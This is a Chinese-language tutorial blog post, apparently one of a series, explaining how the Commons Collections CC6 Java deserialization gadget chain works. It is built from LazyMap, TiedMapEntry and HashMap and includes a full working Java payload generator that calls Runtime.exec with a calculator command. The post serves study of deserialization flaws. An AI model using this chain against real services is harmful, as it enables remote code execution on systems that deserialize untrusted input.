获取中...

-

Just a minute...

CC6链其实就是URLDNS链的前半加上CC1链的后半。

思维导图

链子构建

入口类跟CC1链完全一致,这里不再赘述。

在找哪里调用了ChainedTransformer.transform方法时,CC1链是找到了TransformedMap类。而这里是选择了LazyMap类里的get方法。

image-20240410110401378

1
2
3
4
5
6
7
8
public Object get(Object key) {
if (map.containsKey(key) == false) { //注意这里需要LazyMap的factory属性是空,这里我们后面再说。
Object value = factory.transform(key); //此处的factory如果是ChainedTransformer,就可以完成链子
map.put(key, value);
return value;
}
return map.get(key);
}

然后继续找哪里调用了get方法。


最终在TiedMapEntry类里找到了它的getValue()方法里调用了get:

1
2
3
public Object getValue() {
return map.get(key); //此处get如果是LazyMap,就可以完成链子
}

然后也是这个类的hashCode()方法里调用了它的getValue()方法,这样与前面也串联起来了。

1
2
3
4
5
public int hashCode() {
Object value = getValue(); //调用getValue()方法
return (getKey() == null ? 0 : getKey().hashCode()) ^
(value == null ? 0 : value.hashCode());
}

直至hashCode前面的部分在URLDNS链中有讲过,这里不再赘述。这里主要研究TiedMapEntry类。


1
2
3
4
5
public TiedMapEntry(Map map, Object key) {
super();
this.map = map;
this.key = key;
}

它需要的参数很简单,一个map,这里就是我们需要传入的LazyMap,还有一个key,这里用不到可以随便传。

LazyMap里同样有decorate方法,可以修饰map。

1
2
3
public static Map decorate(Map map, Transformer factory) {
return new LazyMap(map, factory);
}

我们先new一个LazyMap对象,并把ChainedTransformer传入:

1
Map<Object,Object> lazymap = LazyMap.decorate(new HashMap<>(), chainedTransformer);

然后new一个TiedMapEntry对象

1
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");

接下来我们new一个HashMap对象,因为这个类是readObject入口。

1
2
HashMap<Object,Object> map = new HashMap<>();
map.put(tiedMapEntry,"bbb");

问题&解决

那么正常来说,我们直接序列化反序列化就可以了。但是别忘了,我们在URLDNS链里也提到过,如果现在序列化,在put方法里会直接调用hash方法执行整条链子,触发payload,并修改了hashCode值,导致反序列化的时候不会触发payload。

那这里还是老方法,通过反射来修改put里的key,这里就是tiedMapEntry,而tiedMapEntry里放的LazyMap,所以我们只需要把LazyMap里的factory改成空就行了。

1
2
3
4
5
6
7
8
Map<Object,Object> lazymap = LazyMap.decorate(new HashMap<>(), new ConstantTransformer(Runtime.class));              //在newLazyMap对象的时候,把factory属性随便写个没用的Transformer
…………
…………
//反射修改factory属性
Class c = LazyMap.class; //获取LazyMap对象的类
Field factoryfield = c.getDeclaredField("factory"); //获取LazyMap对象的类中的factory属性
factoryfield.setAccessible(true); //因为factory是private的变量,所以需要设置
factoryfield.set(lazymap,chainedTransformer); //设置factory值chainedTransformer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
public static void main(String[] args) throws Exception{
//序列化InvokerTransformer,反射调用exec函数执行命令。
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"mate-calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

//生成LazyMap对象并将其传给TiedMapEntry
Map<Object,Object> lazymap = LazyMap.decorate(new HashMap<>(), new ConstantTransformer(Runtime.class));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");

HashMap<Object,Object> map = new HashMap<>();
map.put(tiedMapEntry,"bbb"); //在put的时候lazymap里的factory属性是空,就不会触发hash

//反射修改factory属性
Class c = LazyMap.class; //获取LazyMap对象的类
Field factoryfield = c.getDeclaredField("factory"); //获取LazyMap对象的类中的factory属性
factoryfield.setAccessible(true); //因为factory是private的变量,所以需要设置
factoryfield.set(lazymap,chainedTransformer); //设置factory值chainedTransformer

serialize(map);//在序列化的时候factory值又变成了chainedTransformer
}

但是改成这样还是不能反序列化执行命令。

还记得最开始LazyMap类里的get方法有一个if判断吗?

1
2
3
4
5
6
7
8
public Object get(Object key) {
if (map.containsKey(key) == false) { //注意这里需要LazyMap的factory属性是空,这里我们后面再说。
Object value = factory.transform(key); //此处的factory如果是ChainedTransformer,就可以完成链子
map.put(key, value);
return value;
}
return map.get(key);
}

这里在序列化的时候,我们确确实实让LazyMap的factory属性是空了,但是,进入这个if后,执行了map.put(key, value);就会让LazyMap的factory属性不是空了。

所以,我们需要手动将LazyMap的factory属性置空,只需要在map.put(tiedMapEntry,”bbb”);后移除key即可:

1
2
map.put(tiedMapEntry,"bbb");
lazymap.remove("aaa");

至此,我们的整条CC6链写完了。

image-20240410131412406

完整CC6链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;

public class CC6TEST {
public static void main(String[] args) throws Exception{
//序列化InvokerTransformer,反射调用exec函数执行命令。
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"mate-calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

//生成LazyMap对象并将其传给TiedMapEntry
Map<Object,Object> lazymap = LazyMap.decorate(new HashMap<>(), new ConstantTransformer(Runtime.class));
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,"aaa");

HashMap<Object,Object> map = new HashMap<>();
map.put(tiedMapEntry,"bbb"); //在put的时候lazymap里的factory属性是空,就不会触发hash
lazymap.remove("aaa"); //让LazyMap的factory属性置空

//反射修改factory属性
Class c = LazyMap.class; //获取LazyMap对象的类
Field factoryfield = c.getDeclaredField("factory"); //获取LazyMap对象的类中的factory属性
factoryfield.setAccessible(true); //因为factory是private的变量,所以需要设置
factoryfield.set(lazymap,chainedTransformer); //设置factory值chainedTransformer

serialize(map); //在序列化的时候factory值又变成了chainedTransformer
}

public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("serialize"));
oos.writeObject(obj);
}
}
相关文章
评论
分享
  • JAVA反序列化——CB链

    依赖jdk:jdk8u65 CB:commons-beanutils 1.8.3 在pom.xml里添加 12345678910<dependency> <groupId>commons-beanut...

    JAVA反序列化——CB链
  • JAVA反序列化——CC7链及CC链总结

    跟CC5一样,也是利用CC1的LazyMap.get及之后的部分,也是只改了开头。 这次是利用Hashtable.readObject方法,这个类是可以序列化的。 寻找在AbstractMap类里的equals方法调用了get方法: ...

    JAVA反序列化——CC7链及CC链总结
  • JAVA反序列化——CC5链

    CC5也是在CC1的路线上改了改入口类。 从AnnotationInvocationHandler.readObject改成了BadAttributeValueExpException.readObject 沿用CC1从LazyMap...

    JAVA反序列化——CC5链
  • JAVA反序列化——另一条CC1链

    之前的CC1链是利用TransformedMap的checkSetValue方法来调用ChainedTransformer.transform 而另一种写法是利用LazyMap.get方法走动态代理来调用ChainedTransfor...

    JAVA反序列化——另一条CC1链
  • JAVA反序列化——CC2链

    详细请看CC4链。CC2链跟CC4链几乎一样,就是在CC4利用InstantiateTransformer类的基础上改成了直接使用InvokerTransformer,其他没变。 123456CC4:Transformer[] tra...

    JAVA反序列化——CC2链
  • JAVA反序列化——CC4链

    新依赖: 12345<dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collec...

    JAVA反序列化——CC4链
  • JAVA反序列化——CC3链

    这条链是利用动态类加载来经行代码执行。 原理根据java类的动态加载原理,我们知道动态类加载可以通过ClassLoader来完成。而其中有个ClassLoader.defineClass可以从字节码加载任意类。 因为是动态类加载,我们...

    JAVA反序列化——CC3链
  • JAVA反序列化——CC1链

    前言CC1链有两种写法,我这种写法跟ysoserial里的写法不一样,另一种写法写在另一篇文章。 cc1链要求java版本小于jdk8u71 我这里用的JDK版本是8u66 因为在高版本这条链子最后的annotationInvocat...

    JAVA反序列化——CC1链
  • java反序列化——URLDNS链

    原理:根据反序列化的一般要求,首先URL类肯定是需要能实现反序列化的接口的。 而在URL类里的hashcode方法里,会先进行一个判断,如果不是-1,那么就进入URLStreamHandler类里的hashCode方法: 而在这...

    java反序列化——URLDNS链
  • ByteCTF2024大师赛web部分wp

    ezobj源码: 12345678910111213141516171819<?phpini_set("display_errors", "On");include_once("...

    ByteCTF2024大师赛web部分wp